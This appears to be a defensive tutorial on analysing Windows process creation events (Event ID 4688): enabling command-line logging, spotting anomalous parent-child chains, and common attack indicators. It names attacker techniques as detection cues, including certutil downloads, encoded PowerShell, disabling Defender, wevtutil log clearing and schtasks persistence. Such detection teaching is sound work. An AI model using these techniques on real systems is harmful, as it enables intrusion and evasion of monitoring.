Process Tracking Analysis

Process tracking events reveal what actually executes on Windows systems. While authentication events show who accessed systems, process events show what they did—the actual commands, scripts, and tools involved in both legitimate work and attacks.

Process Creation Events

Event ID 4688 logs process creation. By default, it records the process name and user. With proper configuration, it also captures the command line—dramatically increasing investigative value.

Enable command line logging through Group Policy: Computer Configuration > Administrative Templates > System > Audit Process Creation > Include command line in process creation events.

The process creation record includes:

• NewProcessName - Full path to the executable


• CommandLine - Arguments passed to the process


• ParentProcessName - Process that started this one


• SubjectUserName - User context for execution


• TokenElevationType - Whether running elevated

Parent-Child Relationships

Process relationships reveal attack chains. Normal processes have expected parents:

• cmd.exe typically has explorer.exe or another shell as parent


• powershell.exe typically has explorer.exe, cmd.exe, or another expected launcher


• Office applications should not spawn cmd.exe or powershell.exe

Unusual parent-child relationships often indicate malicious activity:

Word spawning PowerShell - Classic macro-based malware behavior
Services.exe spawning cmd.exe - Possible malicious service
WmiPrvSE.exe spawning processes - WMI-based execution
svchost.exe with unexpected children - Process injection or malicious service

Common Attack Indicators

Living off the land binaries (LOLBins) - Legitimate Windows binaries abused for malicious purposes: certutil downloading files, mshta executing scripts, regsvr32 loading remote COM objects.

Encoded PowerShell commands - Base64-encoded commands often hide malicious activity. Look for -EncodedCommand or -enc flags.

Suspicious paths - Executables running from temp directories, public folders, or recycle bin locations.

Command line red flags - Downloading content (Invoke-WebRequest, certutil), disabling security features (Set-MpPreference), clearing logs (wevtutil), establishing persistence (schtasks, reg add).

Combine process monitoring with other data sources. Process execution context helps interpret network connections, file modifications, and other activities.